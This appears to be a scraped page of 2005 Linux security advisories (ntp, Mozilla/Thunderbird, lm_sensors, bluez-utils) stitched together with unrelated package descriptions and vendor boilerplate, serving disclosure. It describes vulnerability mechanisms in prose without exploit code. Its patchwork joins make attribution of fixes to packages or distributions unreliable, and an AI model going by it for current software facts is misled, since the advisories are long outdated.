Description :
The Network Time Protocol (NTP) is used to synchronize a computer's
time with another reference time source. The ntp package contains
utilities and daemons that will synchronize your computer's time to
Coordinated Universal Time (UTC) via the NTP protocol and NTP
servers. The ntp package includes ntpdate (a program for retrieving
the date and time from remote machines via a network) and ntpd (a
daemon which continuously adjusts system time).

Install the ntp package if you need tools for keeping your
system's time synchronized via the NTP protocol.

Update Information:

When starting xntpd with the -u option and specifying the group
by using a string not a numeric gid the daemon uses the gid of the
user not the group. This problem is now fixed by this update.

The Common Vulnerabilities and Exposures project assigned the
name CAN-2005-2496 to this issue.

Description :
LessTif is a free replacement for OSF/Motif(R), which provides a
full set of widgets for application development (menus, text entry
areas, scrolling windows, etc.). LessTif is source compatible with
OSF/Motif(R) 1.2. The widget set code is the primary focus of
development. If you are installing lesstif, you also need to
install lesstif-clients.

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or
alternatively, you may file a bug at http://bugs.gentoo.org.

A number of vulnerabilities were reported and fixed in
Thunderbird 1.0.5 and Mozilla 1.7.9. The following vulnerabilities
have been backported and patched for this update:

The native implementations of InstallTrigger and other
XPInstallrelated javascript objects did not properly validate that
they were called on instances of the correct type. By passing other
objects, even raw numbers, the javascript interpreter would jump to
the wrong place in memory. Although no proof of concept has been
developed we believe this could be exploited (MFSA 2005-40).

moz_bug_r_a4 reported several exploits giving an attacker the
ability to install malicious code or steal data, requiring only
that the user do commonplace actions like clicking on a link or
open the context menu. The common cause in each case was privileged
UI code ("chrome") being overly trusting of DOM nodes from the
content window. Scripts in the web page can override properties and
methods of DOM nodes and shadow the native values, unless steps are
taken to get the true underlying values (MFSA 2005-41).

Additional checks were added to make sure Javascript eval and
Script objects are run with the privileges of the context that
created them, not the potentially elevated privilege of the context
calling them in order to protect against an additional variant of
MFSA 2005-41 (MFSA 2005-44).

In several places the browser UI did not correctly distinguish
between true user events, such as mouse clicks or keystrokes, and
synthetic events genenerated by web content. The problems ranged
from minor annoyances like switching tabs or entering full-screen
mode, to a variant on MFSA 2005-34 Synthetic events are now
prevented from reaching the browser UI entirely rather than depend
on each potentially spoofed function to protect itself from
untrusted events (MFSA 2005-45).

Scripts in XBL controls from web content continued to be run
even when Javascript was disabled. By itself this causes no harm,
but it could be combined with most script-based exploits to attack
people running vulnerable versions who thought disabling javascript
would protect them. In the Thunderbird and Mozilla Suite mail
clients Javascript is disabled by default for protection against
denial-of-service attacks and worms; this vulnerability could be
used to bypass that protection (MFSA 2005-46).

When InstallVersion.compareTo() is passed an object rather than
a string it assumed the object was another InstallVersion without
verifying it. When passed a different kind of object the browser
would generally crash with an access violation. shutdown has
demonstrated that different javascript objects can be passed on
some OS versions to get control over the instruction pointer. We
assume this could be developed further to run arbitrary machine
code if the attacker can get exploit code loaded at a predictable
address (MFSA 2005-50).

A child frame can call top.focus() even if the framing page
comes from a different origin and has overridden the focus()
routine. The call is made in the context of the child frame. The
attacker would look for a target site with a framed page that makes
this call but doesn't verify that its parent comes from the same
site. The attacker could steal cookies and passwords from the
framed page, or take actions on behalf of a signed-in user. This
attack would work only against sites that use frames in this manner
(MFSA 2005-52).

Parts of the browser UI relied too much on DOM node names
without taking different namespaces into account and verifying that
nodes really were of the expected type. An XHTML document could be
used to create fake <IMG> elements, for example, with
content-defined properties that the browser would access as if they
were the trusted built-in properties of the expected HTML elements.
The severity of the vulnerability would depend on what the attacker
could convince the victim to do, but could result in executing
user-supplied script with elevated "chrome" privileges. This could
be used to install malicious software on the victim's machine (MFSA
2005-55).

Improper cloning of base objects allowed web content scripts to
walk up the prototype chain to get to a privileged object. This
could be used to execute code with enhanced privileges (MFSA
2005-56).

The updated packages have been patched to address these
issue.

Update:

There was a slight regression in the handling of "right-click"
menus in the packages previously released that is corrected with
this new update.

Javier Fernandez-Sanguino Pena discovered that the pwmconfig
script in the lm_sensors package created temporary files in an
insecure manner. This could allow a symlink attack to create or
overwrite arbitrary files with full root privileges because
pwmconfig is typically executed by root.

The updated packages have been patched to correct this problem
by using mktemp to create the temporary files.

A vulnerability in bluez-utils was discovered by Henryk Plotz.
Due to missing input sanitizing, it was possible for an attacker to
execute arbitrary commands supplied as a device name from the
remote bluetooth device.

Advertiser Disclosure:
Some of the products that appear on this site are from companies from which QuinStreet receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. QuinStreet does not include all companies or all types of products available in the marketplace.